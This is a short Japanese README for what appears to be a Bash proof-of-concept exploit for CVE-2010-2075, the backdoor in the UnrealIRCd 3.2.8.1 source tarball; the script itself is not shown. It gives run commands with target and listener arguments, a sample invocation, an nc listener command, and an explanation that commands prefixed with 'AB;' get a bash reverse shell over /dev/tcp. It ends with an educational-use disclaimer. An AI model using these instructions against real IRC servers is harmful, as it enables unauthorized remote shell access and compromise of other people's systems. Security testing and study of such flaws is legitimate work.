
CVE-2010-2075エクスプロイト
UnrealIRCd 3.2.8.1 のソースtarballに導入されたバックドアのBash PoC。
改ざんされたバイナリは、IRCポートに送信されたAB;で始まる任意のコマンドを実行します。
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
例:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
実行前にリスナーをセットアップしてください:
nc -lvnp 4444
バックドアは受信データにAB;というプレフィックスがないかチェックし、残りをシステムシェルに渡します。ペイロードは/dev/tcpを介してbashリバースシェルを送信します。
教育および許可されたテスト目的のみに使用してください。